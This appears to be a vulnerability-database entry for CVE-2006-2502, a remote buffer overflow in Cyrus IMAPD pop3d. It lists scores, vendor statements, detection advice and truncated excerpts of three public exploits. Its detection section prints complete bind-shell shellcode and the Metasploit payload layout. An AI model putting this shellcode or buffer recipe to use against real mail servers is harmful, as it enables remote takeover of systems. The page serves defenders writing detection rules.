CVE-2006-2502
published 2006-05-22CVE-2006-2502: Stack-based buffer overflow in pop3d in Cyrus IMAPD (cyrus-imapd) 2.3.2, when the popsubfolders option is enabled, allows remote attackers to execute arbitrary…
PriorityP348medium5.1CVSS 2.0
AVNACHAuNCPIPAP
EXPLOIT
EPSS
53.33%
98.9th percentile
Stack-based buffer overflow in pop3d in Cyrus IMAPD (cyrus-imapd) 2.3.2, when the popsubfolders option is enabled, allows remote attackers to execute arbitrary code via a long USER command.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cyrus | imapd | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96\x43\x52\x66\x68\x34\x3a\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
- →Detect exploitation attempts by monitoring POP3 (TCP/110) for oversized USER commands — the exploit sends a USER argument containing shellcode followed by repeated return address packing, resulting in a payload well exceeding normal username length. ↗
- →Alert on inbound TCP connections to port 13370 from a host that recently sent a malformed POP3 USER command — the bind-shell shellcode opens a listener on port 13370. ↗
- →Scan network traffic on TCP/110 for the bind-shell shellcode byte sequence starting with \x31\xdb\x53\x43\x53\x6a\x02 within a USER command. ↗
- →The exploit overwrites the GOT to place shellcode and defeat stack-protection/ASLR; monitor for unexpected executable memory writes in pop3d process space (e.g., via ptrace or kernel auditing). ↗
- →The vulnerability is only triggerable when the non-default 'popsubfolders' option is enabled in Cyrus IMAPD config; audit imapd.conf for this setting as a risk indicator. ↗
- →The Metasploit exploit buffer layout is: 'USER ' + 265 NOPs + ret*2 + (250-shellcode_len) NOPs + shellcode + 29 NOPs + sc_addr*4 + CRLF — use this structure to build a Snort/Suricata content match on TCP/110. ↗
- ·The vulnerability is only exploitable when the non-default 'popsubfolders' option is enabled in Cyrus IMAPD configuration; systems without this option are not affected. ↗
- ·Fedora Core 5 ships with the vulnerable code version but is not exploitable due to the FORTIFY_SOURCE compiler enhancement. ↗
- ·Red Hat Enterprise Linux versions of cyrus-imapd are not affected by this issue. ↗
CVSS provenance
nvdv2.05.1MEDIUMAV:N/AC:H/Au:N/C:P/I:P/A:P
vendor_redhat5.1MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-vqvc-vrx3-5hgj: Stack-based buffer overflow in pop3d in Cyrus IMAPD (cyrus-imapd) 2
ghsa_unreviewed·2022-05-01
CVE-2006-2502 [MEDIUM] GHSA-vqvc-vrx3-5hgj: Stack-based buffer overflow in pop3d in Cyrus IMAPD (cyrus-imapd) 2
Stack-based buffer overflow in pop3d in Cyrus IMAPD (cyrus-imapd) 2.3.2, when the popsubfolders option is enabled, allows remote attackers to execute arbitrary code via a long USER command.
Red Hat
CVE-2006-2502: Stack-based buffer overflow in pop3d in Cyrus IMAPD (cyrus-imapd) 2
vendor_redhat·CVSS 5.1
CVE-2006-2502 [MEDIUM] CVE-2006-2502: Stack-based buffer overflow in pop3d in Cyrus IMAPD (cyrus-imapd) 2
Stack-based buffer overflow in pop3d in Cyrus IMAPD (cyrus-imapd) 2.3.2, when the popsubfolders option is enabled, allows remote attackers to execute arbitrary code via a long USER command.
Statement: Not vulnerable. This issue does not affect the versions of cyrus-imapd distributed with Red Hat Enterprise Linux.
No detection rules found.
Exploit-DB
Cyrus IMAPD - pop3d popsubfolders USER Buffer Overflow (Metasploit)
exploitdb·2010-04-30
CVE-2006-2502 Cyrus IMAPD - pop3d popsubfolders USER Buffer Overflow (Metasploit)
Cyrus IMAPD - pop3d popsubfolders USER Buffer Overflow (Metasploit)
---
##
# $Id: cyrus_pop3d_popsubfolders.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow',
'Description' => %q{
This exploit takes advantage of a stack based overflow. Once the stack
corruption has occured it is possible to overwrite a pointer which is
later used for a memcpy. This gives us a write anything anywhere condition
similar to a format string vulnerability.
NOTE: The popsubfo
Exploit-DB
Cyrus IMAPD 2.3.2 - 'pop3d' Remote Buffer Overflow (3)
exploitdb·2006-08-14
CVE-2006-2502 Cyrus IMAPD 2.3.2 - 'pop3d' Remote Buffer Overflow (3)
Cyrus IMAPD 2.3.2 - 'pop3d' Remote Buffer Overflow (3)
---
#!/usr/bin/perl
## Creator: K-sPecial (xzziroz.net) of .aware (awarenetwork.org)
## Name: bid-18056.pl
## Date: 08/12/2006
##
## Description: this is yet another exploit for the cyrus pop3d buffer overflow. I tried both public
## exploits and not either of them worked (not that they don't but coding my own is generaly faster
## and easier) so I coded my own. The exploit by kcope seems to be done right and maybe i just got realy
## unlucky and missed the offset in between the 5 runs i gave it. The one from bannedit was interesting...
## realy nice idea about overwriting the pointer and sticking your shellcode in GOT. Only problem is that
## when i was writing this exploit with the same method, and i placed my shellcode in GOT, fun
Exploit-DB
Cyrus IMAPD 2.3.2 - 'pop3d' Remote Buffer Overflow (1)
exploitdb·2006-05-21
CVE-2006-2502 Cyrus IMAPD 2.3.2 - 'pop3d' Remote Buffer Overflow (1)
Cyrus IMAPD 2.3.2 - 'pop3d' Remote Buffer Overflow (1)
---
/* zeroday warez
* !!! PRIVATE - DONT DISTRIBUTE - PRIVATE !!!
* cyruspop3d.c - cyrus pop3d remote exploit by kcope
* tested on cyrus-imapd-2.3.2,linux
*
* bug found 23 Apr 2006 by kcope
*
* imapd/pop3d.c line 1830 :
* char userbuf[MAX_MAILBOX_NAME+1], *p;
* ...
* if (!ulen) ulen = strlen(user);
* if (config_getswitch(IMAPOPT_POPSUBFOLDERS)) {
* memcpy(userbuf, user, ulen);
* userbuf[ulen] = '\0';
* ...
* popsubfolders has to be enabled
*
* thnx to blackzero revoguard wY! qobaiashi bogus alex
* Love to Lisa :-)
* !!! PRIVATE - DONT DISTRIBUTE - PRIVATE !!!
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define POP3PORT 110
#define BINDPORT 13370
unsigned char shellcode[] =
Metasploit
Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow
metasploit
Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow
Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow
This exploit takes advantage of a stack based overflow. Once the stack corruption has occurred it is possible to overwrite a pointer which is later used for a memcpy. This gives us a write anything anywhere condition similar to a format string vulnerability. NOTE: The popsubfolders option is a non-default setting. I chose to overwrite the GOT with my shellcode and return to it. This defeats the VA random patch and possibly other stack protection features. Tested on gentoo-sources Linux 2.6.16. Although Fedora CORE 5 ships with a version containing the vulnerable code, it is not exploitable due to the use of the FORTIFY_SOURCE compiler enhancement.
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/fulldisclosure/2006-05/0527.htmlhttp://securitytracker.com/id?1016131http://www.securityfocus.com/bid/18056http://www.vupen.com/english/advisories/2006/1891https://exchange.xforce.ibmcloud.com/vulnerabilities/26578http://archives.neohapsis.com/archives/fulldisclosure/2006-05/0527.htmlhttp://securitytracker.com/id?1016131http://www.securityfocus.com/bid/18056http://www.vupen.com/english/advisories/2006/1891https://exchange.xforce.ibmcloud.com/vulnerabilities/26578
2006-05-22
Published